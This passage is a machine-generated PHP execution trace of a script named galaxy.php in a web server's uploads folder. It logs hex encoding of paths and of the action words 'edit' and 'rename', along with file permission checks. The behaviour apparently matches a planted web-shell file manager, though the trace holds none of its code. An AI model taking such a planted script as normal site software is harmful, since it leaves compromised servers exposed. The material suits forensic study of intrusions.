2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1230	0	0.043004	484536	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1230	1	0.043016	484576
3	1230	R			97
3	1231	0	0.043028	484536	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1231	1	0.043040	484608
3	1231	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1232	0	0.043077	484536	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1232	1	0.043089	484576
3	1232	R			108
3	1233	0	0.043101	484536	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1233	1	0.043113	484608
3	1233	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1234	0	0.043142	484536	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1234	1	0.043153	484576
3	1234	R			97
3	1235	0	0.043166	484536	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1235	1	0.043177	484608
3	1235	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1236	0	0.043207	484544	ord	0		/var/www/html/uploads/galaxy.php	18	1	'x'
3	1236	1	0.043218	484584
3	1236	R			120
3	1237	0	0.043231	484544	dechex	0		/var/www/html/uploads/galaxy.php	18	1	120
3	1237	1	0.043242	484616
3	1237	R			'78'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '78'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1238	0	0.043272	484544	ord	0		/var/www/html/uploads/galaxy.php	18	1	'y'
3	1238	1	0.043283	484584
3	1238	R			121
3	1239	0	0.043295	484544	dechex	0		/var/www/html/uploads/galaxy.php	18	1	121
3	1239	1	0.043307	484616
3	1239	R			'79'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '79'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1240	0	0.043336	484544	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1240	1	0.043347	484584
3	1240	R			46
3	1241	0	0.043359	484544	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1241	1	0.043371	484616
3	1241	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1242	0	0.043401	484544	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1242	1	0.043412	484584
3	1242	R			112
3	1243	0	0.043424	484544	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1243	1	0.043435	484616
3	1243	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1244	0	0.043465	484552	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1244	1	0.043476	484592
3	1244	R			104
3	1245	0	0.043488	484552	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1245	1	0.043499	484624
3	1245	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1246	0	0.043528	484552	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1246	1	0.043539	484592
3	1246	R			112
3	1247	0	0.043551	484552	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1247	1	0.043562	484624
3	1247	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1227	1	0.043592	484552
2	1227	R			'67616c6178792e706870'
2	1248	0	0.043609	484648	filemtime	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/galaxy.php'
2	1248	1	0.043625	484688
2	1248	R			1676246275
2	1249	0	0.043637	484584	date	0		/var/www/html/uploads/galaxy.php	117	2	'Y-m-d H:i'	1676246275
2	1249	1	0.043681	484912
2	1249	R			'2023-02-12 18:57'
2	1250	0	0.043698	484776	is_writable	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/galaxy.php'
2	1250	1	0.043726	484816
2	1250	R			FALSE
2	1251	0	0.043741	484776	is_readable	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/galaxy.php'
2	1251	1	0.043759	484816
2	1251	R			TRUE
2	1252	0	0.043775	484776	perms	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/galaxy.php'
3	1253	0	0.043789	484776	fileperms	0		/var/www/html/uploads/galaxy.php	29	1	'/var/www/html/uploads/galaxy.php'
3	1253	1	0.043803	484816
3	1253	R			33204
2		A						/var/www/html/uploads/galaxy.php	29	$p = 33204
2		A						/var/www/html/uploads/galaxy.php	32	$i = '-'
2		A						/var/www/html/uploads/galaxy.php	39	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	40	$i .= 'w'
2		A						/var/www/html/uploads/galaxy.php	41	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	42	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	43	$i .= 'w'
2		A						/var/www/html/uploads/galaxy.php	44	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	45	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	46	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	47	$i .= '-'
2	1252	1	0.043929	484816
2	1252	R			'-rw-rw-r--'
2	1254	0	0.043944	484776	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1255	0	0.043977	484776	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1255	1	0.043989	484816
3	1255	R			47
3	1256	0	0.044002	484776	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1256	1	0.044014	484848
3	1256	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1257	0	0.044046	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1257	1	0.044058	484848
3	1257	R			118
3	1258	0	0.044071	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1258	1	0.044083	484880
3	1258	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1259	0	0.044114	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1259	1	0.044126	484848
3	1259	R			97
3	1260	0	0.044138	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1260	1	0.044150	484880
3	1260	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1261	0	0.044181	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1261	1	0.044192	484848
3	1261	R			114
3	1262	0	0.044205	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1262	1	0.044216	484880
3	1262	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1263	0	0.044246	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1263	1	0.044258	484856
3	1263	R			47
3	1264	0	0.044270	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1264	1	0.044282	484888
3	1264	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1265	0	0.044312	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1265	1	0.044324	484856
3	1265	R			119
3	1266	0	0.044336	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1266	1	0.044348	484888
3	1266	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1267	0	0.044378	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1267	1	0.044389	484856
3	1267	R			119
3	1268	0	0.044402	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1268	1	0.044413	484888
3	1268	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1269	0	0.044443	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1269	1	0.044454	484856
3	1269	R			119
3	1270	0	0.044467	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1270	1	0.044478	484888
3	1270	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1271	0	0.044507	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1271	1	0.044518	484864
3	1271	R			47
3	1272	0	0.044531	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1272	1	0.044542	484896
3	1272	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1273	0	0.044571	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1273	1	0.044586	484864
3	1273	R			104
3	1274	0	0.044599	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1274	1	0.044611	484896
3	1274	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1275	0	0.044641	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1275	1	0.044652	484864
3	1275	R			116
3	1276	0	0.044665	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1276	1	0.044676	484896
3	1276	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1277	0	0.044706	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1277	1	0.044717	484864
3	1277	R			109
3	1278	0	0.044729	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1278	1	0.044740	484896
3	1278	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1279	0	0.044770	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1279	1	0.044781	484872
3	1279	R			108
3	1280	0	0.044794	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1280	1	0.044805	484904
3	1280	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1281	0	0.044835	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1281	1	0.044846	484872
3	1281	R			47
3	1282	0	0.044875	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1282	1	0.044887	484904
3	1282	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1283	0	0.044916	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1283	1	0.044927	484872
3	1283	R			117
3	1284	0	0.044939	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1284	1	0.044950	484904
3	1284	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1285	0	0.044980	484832	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1285	1	0.044991	484872
3	1285	R			112
3	1286	0	0.045003	484832	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1286	1	0.045014	484904
3	1286	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1287	0	0.045043	484840	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1287	1	0.045054	484880
3	1287	R			108
3	1288	0	0.045066	484840	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1288	1	0.045077	484912
3	1288	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1289	0	0.045106	484840	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1289	1	0.045118	484880
3	1289	R			111
3	1290	0	0.045130	484840	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1290	1	0.045141	484912
3	1290	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1291	0	0.045170	484840	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1291	1	0.045181	484880
3	1291	R			97
3	1292	0	0.045192	484840	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1292	1	0.045204	484912
3	1292	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1293	0	0.045233	484840	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1293	1	0.045244	484880
3	1293	R			100
3	1294	0	0.045256	484840	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1294	1	0.045267	484912
3	1294	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1295	0	0.045299	484856	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1295	1	0.045359	484896
3	1295	R			115
3	1296	0	0.045373	484856	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1296	1	0.045386	484928
3	1296	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1254	1	0.045416	484856
2	1254	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1297	0	0.045432	484840	hex	1		/var/www/html/uploads/galaxy.php	117	1	'edit'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1298	0	0.045463	484840	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1298	1	0.045474	484880
3	1298	R			101
3	1299	0	0.045486	484840	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1299	1	0.045498	484912
3	1299	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1300	0	0.045527	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1300	1	0.045538	484912
3	1300	R			100
3	1301	0	0.045550	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1301	1	0.045561	484944
3	1301	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1302	0	0.045590	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	1302	1	0.045602	484912
3	1302	R			105
3	1303	0	0.045614	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	1303	1	0.045626	484944
3	1303	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1304	0	0.045655	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1304	1	0.045666	484912
3	1304	R			116
3	1305	0	0.045678	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1305	1	0.045689	484944
3	1305	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1297	1	0.045718	484880
2	1297	R			'65646974'
2	1306	0	0.045731	484840	hex	1		/var/www/html/uploads/galaxy.php	117	1	'galaxy.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1307	0	0.045761	484840	ord	0		/var/www/html/uploads/galaxy.php	18	1	'g'
3	1307	1	0.045773	484880
3	1307	R			103
3	1308	0	0.045785	484840	dechex	0		/var/www/html/uploads/galaxy.php	18	1	103
3	1308	1	0.045796	484912
3	1308	R			'67'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '67'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1309	0	0.045826	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1309	1	0.045837	484912
3	1309	R			97
3	1310	0	0.045849	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1310	1	0.045861	484944
3	1310	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1311	0	0.045890	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1311	1	0.045901	484912
3	1311	R			108
3	1312	0	0.045913	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1312	1	0.045924	484944
3	1312	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1313	0	0.045954	484872	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1313	1	0.045965	484912
3	1313	R			97
3	1314	0	0.045977	484872	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1314	1	0.045988	484944
3	1314	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1315	0	0.046017	484880	ord	0		/var/www/html/uploads/galaxy.php	18	1	'x'
3	1315	1	0.046029	484920
3	1315	R			120
3	1316	0	0.046041	484880	dechex	0		/var/www/html/uploads/galaxy.php	18	1	120
3	1316	1	0.046051	484952
3	1316	R			'78'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '78'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1317	0	0.046091	484880	ord	0		/var/www/html/uploads/galaxy.php	18	1	'y'
3	1317	1	0.046103	484920
3	1317	R			121
3	1318	0	0.046115	484880	dechex	0		/var/www/html/uploads/galaxy.php	18	1	121
3	1318	1	0.046126	484952
3	1318	R			'79'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '79'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1319	0	0.046155	484880	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1319	1	0.046167	484920
3	1319	R			46
3	1320	0	0.046179	484880	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1320	1	0.046191	484952
3	1320	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1321	0	0.046220	484880	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1321	1	0.046232	484920
3	1321	R			112
3	1322	0	0.046243	484880	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1322	1	0.046254	484952
3	1322	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1323	0	0.046283	484888	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1323	1	0.046295	484928
3	1323	R			104
3	1324	0	0.046307	484888	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1324	1	0.046318	484960
3	1324	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1325	0	0.046347	484888	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1325	1	0.046358	484928
3	1325	R			112
3	1326	0	0.046370	484888	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1326	1	0.046381	484960
3	1326	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1306	1	0.046411	484888
2	1306	R			'67616c6178792e706870'
2	1327	0	0.046425	485032	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1328	0	0.046456	485032	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1328	1	0.046468	485072
3	1328	R			47
3	1329	0	0.046480	485032	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1329	1	0.046492	485104
3	1329	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1330	0	0.046521	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1330	1	0.046533	485104
3	1330	R			118
3	1331	0	0.046545	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1331	1	0.046556	485136
3	1331	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1332	0	0.046584	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1332	1	0.046596	485104
3	1332	R			97
3	1333	0	0.046608	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1333	1	0.046619	485136
3	1333	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1334	0	0.046648	485064	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1334	1	0.046659	485104
3	1334	R			114
3	1335	0	0.046671	485064	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1335	1	0.046682	485136
3	1335	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1336	0	0.046711	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1336	1	0.046722	485112
3	1336	R			47
3	1337	0	0.046734	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1337	1	0.046745	485144
3	1337	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1338	0	0.046777	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1338	1	0.046789	485112
3	1338	R			119
3	1339	0	0.046807	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1339	1	0.046819	485144
3	1339	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1340	0	0.046848	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1340	1	0.046859	485112
3	1340	R			119
3	1341	0	0.046871	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1341	1	0.046883	485144
3	1341	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1342	0	0.046911	485072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1342	1	0.046922	485112
3	1342	R			119
3	1343	0	0.046934	485072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1343	1	0.046946	485144
3	1343	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1344	0	0.046974	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1344	1	0.046985	485120
3	1344	R			47
3	1345	0	0.046997	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1345	1	0.047008	485152
3	1345	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1346	0	0.047037	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1346	1	0.047048	485120
3	1346	R			104
3	1347	0	0.047060	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1347	1	0.047071	485152
3	1347	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1348	0	0.047099	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1348	1	0.047111	485120
3	1348	R			116
3	1349	0	0.047123	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1349	1	0.047134	485152
3	1349	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1350	0	0.047163	485080	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1350	1	0.047175	485120
3	1350	R			109
3	1351	0	0.047187	485080	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1351	1	0.047198	485152
3	1351	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1352	0	0.047227	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1352	1	0.047239	485128
3	1352	R			108
3	1353	0	0.047250	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1353	1	0.047262	485160
3	1353	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1354	0	0.047291	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1354	1	0.047302	485128
3	1354	R			47
3	1355	0	0.047314	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1355	1	0.047325	485160
3	1355	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1356	0	0.047353	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1356	1	0.047365	485128
3	1356	R			117
3	1357	0	0.047377	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1357	1	0.047387	485160
3	1357	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1358	0	0.047416	485088	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1358	1	0.047427	485128
3	1358	R			112
3	1359	0	0.047439	485088	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1359	1	0.047450	485160
3	1359	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1360	0	0.047485	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1360	1	0.047496	485136
3	1360	R			108
3	1361	0	0.047509	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1361	1	0.047520	485168
3	1361	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1362	0	0.047549	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1362	1	0.047560	485136
3	1362	R			111
3	1363	0	0.047573	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1363	1	0.047584	485168
3	1363	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1364	0	0.047613	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1364	1	0.047624	485136
3	1364	R			97
3	1365	0	0.047636	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1365	1	0.047647	485168
3	1365	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1366	0	0.047676	485096	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1366	1	0.047687	485136
3	1366	R			100
3	1367	0	0.047699	485096	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1367	1	0.047711	485168
3	1367	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1368	0	0.047740	485112	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1368	1	0.047751	485152
3	1368	R			115
3	1369	0	0.047763	485112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1369	1	0.047774	485184
3	1369	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1327	1	0.047803	485112
2	1327	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1370	0	0.047818	485032	hex	1		/var/www/html/uploads/galaxy.php	117	1	'rename'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1371	0	0.047849	485032	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1371	1	0.047860	485072
3	1371	R			114
3	1372	0	0.047872	485032	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1372	1	0.047883	485104
3	1372	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
